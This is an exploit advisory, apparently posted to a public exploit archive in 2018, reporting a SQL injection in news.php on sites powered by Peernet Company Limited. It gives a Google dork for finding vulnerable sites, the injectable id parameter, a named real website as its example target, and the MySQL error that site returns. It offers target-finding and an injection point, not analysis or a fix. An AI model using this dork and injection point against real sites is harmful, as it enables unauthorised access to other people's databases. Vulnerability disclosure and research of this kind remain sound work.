#################################################################################################
# Exploit Title : Powered by Peernet Company Limited HkPeernet.Com SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/06/2018
# Vendor Homepage : hkpeernet.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Powered by Peernet Company Limited'' site:hk
# Exploit : /PATH/news.php?id=[SQL Inj]
#################################################################################################
# Example Site : cmkoo.com.hk/en/news/news.php?id=23%27 => [ Proof of Concept ] => archive.is/yWiha
# SQL Database Error :
error info: MySQL Query Error
Script : SQL: SELECT * FROM `news` WHERE `id` = 23\'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Errno.: 1064
################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################